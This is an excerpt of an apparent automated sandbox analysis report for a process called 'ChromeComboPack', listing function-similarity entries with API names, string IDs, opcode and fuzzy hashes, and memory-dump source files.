                                                                                                                                                                                                                                                • API String ID: 1152936543-4103459575
                                                                                                                                                                                                                                                • Opcode ID: e443cbe33a69a4e9ccd6b9eb4e5bf13f7ca75ca43a2515781c54e467d984db27
                                                                                                                                                                                                                                                • Instruction ID: f28384d6e615725d226b84db350bb7de586807fe92b7b2dc2e757356eac3617f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e443cbe33a69a4e9ccd6b9eb4e5bf13f7ca75ca43a2515781c54e467d984db27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F08C22B19A4192EB988B25FA9077922A0BB44BD0F886074DE1D87758EF2CE494C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                                                                • String ID: :WAVEFORMATEX
                                                                                                                                                                                                                                                • API String ID: 709158290-1364142124
                                                                                                                                                                                                                                                • Opcode ID: b87b5b271dae4500a872c9a8d630c7e74213b6f1348c28940c0ab33bd005c71f
                                                                                                                                                                                                                                                • Instruction ID: 94c5ad63e313a6847c355bc278bf0a46efd6c841c04c6e9c2389a16cc1835f3d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b87b5b271dae4500a872c9a8d630c7e74213b6f1348c28940c0ab33bd005c71f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF03022B16B4292D7189F21E86017967A0BF8DB44FC85675D64C86354EF3CE294C704
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttrObject_StringSubtypeType_
                                                                                                                                                                                                                                                • String ID: timetuple
                                                                                                                                                                                                                                                • API String ID: 1421930220-3328721318
                                                                                                                                                                                                                                                • Opcode ID: d19154720ba3a1a31f80388809a956ba94848c63bf42471ed6da160e07ef3a78
                                                                                                                                                                                                                                                • Instruction ID: a2900dee96b057c3fe29f1d49d0b94a1cf1a246ae76ecca8b4f4cae2c6c68269
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d19154720ba3a1a31f80388809a956ba94848c63bf42471ed6da160e07ef3a78
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE0ED97F06A46A1FA588B56E8611341750FF58F91F8C50B5CD4D46364EF2CE8D5C601
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                • String ID: @$|ii:ACL
                                                                                                                                                                                                                                                • API String ID: 3371842430-2672190651
                                                                                                                                                                                                                                                • Opcode ID: 37e0a04dbdd66d88dba87736e60bcd60b2cc716513f2cdfbd5e24e8b7461a77d
                                                                                                                                                                                                                                                • Instruction ID: 4850ce3a2df18025626c8291198dbb06bc0136851ea47da597e8017bb902287b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37e0a04dbdd66d88dba87736e60bcd60b2cc716513f2cdfbd5e24e8b7461a77d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48F08C76B096C292E604DF91F8102AAABA4FB80354FC44074EA4C83B64EFBCE119CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTupleValid
                                                                                                                                                                                                                                                • String ID: :IsValid
                                                                                                                                                                                                                                                • API String ID: 2541654197-2800628479
                                                                                                                                                                                                                                                • Opcode ID: a2c7ad6af1abea5f253b7a3b05eb2fc78f02dceca7f840b8d1cfe89c45c020dd
                                                                                                                                                                                                                                                • Instruction ID: 38a907d98b6dc4a437a40277bed69155fb3d549ddbe833d7b40d5783d6f220ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2c7ad6af1abea5f253b7a3b05eb2fc78f02dceca7f840b8d1cfe89c45c020dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73E0EC52F1A90692EB5C8BB2AC6007556E1BF88F95F486070CD1E86360FE2CB5D5C600
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseSizeTuple_Valid
                                                                                                                                                                                                                                                • String ID: :IsValid
                                                                                                                                                                                                                                                • API String ID: 1733704823-2800628479
                                                                                                                                                                                                                                                • Opcode ID: d6672662ff62677f4ee0c9ae0f75957b8217232bd1142c6c8af475a3793489e6
                                                                                                                                                                                                                                                • Instruction ID: 05d1f3320639405f2e3301c42025ad1daa8703342344c25873e9df551e6e3f5b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6672662ff62677f4ee0c9ae0f75957b8217232bd1142c6c8af475a3793489e6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DE0EC52B1A906A2EB5C4BB2AD600752691FF48F95F482070CD6E86360EE2CA9D5C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                • String ID: :IsValid
                                                                                                                                                                                                                                                • API String ID: 1292091245-2800628479
                                                                                                                                                                                                                                                • Opcode ID: 88f9e98b93e5a915f0c9d2f85e788e22b484281a7c608c4bbfbdfe024740cc3c
                                                                                                                                                                                                                                                • Instruction ID: ac9839784842e75f8f255cec83fb5dcc0d7fdbfa278a78d1d5730049d50ed810
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88f9e98b93e5a915f0c9d2f85e788e22b484281a7c608c4bbfbdfe024740cc3c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78E0EC52B1A90692EB5D4BB2AC6007526E0FF88F94F486070CD1D86360FE2CF5D6C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_LengthParseSizeTuple_
                                                                                                                                                                                                                                                • String ID: :GetLength
                                                                                                                                                                                                                                                • API String ID: 986722786-295138441
                                                                                                                                                                                                                                                • Opcode ID: 9f40dc58e3b00cbbe786f80ce784a4c9e75ad5122b7287aeffa16e6cf2c79c5c
                                                                                                                                                                                                                                                • Instruction ID: ca9f5b317a1951e15dcf0b9e88c154081445a28a496481f562e767d5a28c421b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f40dc58e3b00cbbe786f80ce784a4c9e75ad5122b7287aeffa16e6cf2c79c5c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98E08C52B1A906A2EB1C4BB2AC610752690FF48F80F480070CD5E86360EE2CA4D5C200
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DescriptorLengthParseSecurityTuple
                                                                                                                                                                                                                                                • String ID: :GetLength
                                                                                                                                                                                                                                                • API String ID: 840013968-295138441
                                                                                                                                                                                                                                                • Opcode ID: 99bbef9938abcbd77cc71ab482e6a24a020aa0d5f9e310f661fdaecfbdcf0375
                                                                                                                                                                                                                                                • Instruction ID: d5d5fe760dc29effd1ecc05e13297cc19a7b5be4f05e705bdf8299cefb691de1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99bbef9938abcbd77cc71ab482e6a24a020aa0d5f9e310f661fdaecfbdcf0375
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AE0EC52B1AA4692EB5C4BB2AC6107516A0FF48F94F485070CD1E86360EE2CB5D5C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_AuthorityCountParseSizeTuple_
                                                                                                                                                                                                                                                • String ID: :GetSubAuthorityCount
                                                                                                                                                                                                                                                • API String ID: 3376985458-2020981275
                                                                                                                                                                                                                                                • Opcode ID: f0c015188994c3a9580b6de2581154fc77b4ac0713eae07f29022d0ca35b690d
                                                                                                                                                                                                                                                • Instruction ID: ee3a5d892b8cb580a1e029764edbe6379716c9809622b0d95a572c511f089a7b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0c015188994c3a9580b6de2581154fc77b4ac0713eae07f29022d0ca35b690d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3E08652B0A946A1EB4C4BB2AC600752A90FF48F91F480070CD9D46260DE2CF5D5C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                                                • String ID: POINT must be a tuple of 2 ints (x,y)$ll;POINT must be a tuple of 2 ints (x,y)
                                                                                                                                                                                                                                                • API String ID: 1450464846-334919720
                                                                                                                                                                                                                                                • Opcode ID: 0d35483ddf44bfd197dc49b1b6211cb938ad411bb0e78d11a6d325ab75245ce1
                                                                                                                                                                                                                                                • Instruction ID: c16db796bc92eeb66f6e423c3fdaaf9fbf2560379487427e67576e7e1e63f034
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d35483ddf44bfd197dc49b1b6211cb938ad411bb0e78d11a6d325ab75245ce1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42E01266F06A46E0E6088F15E8902B53BA0FB44F48F859172C64D47220DF3CE199C701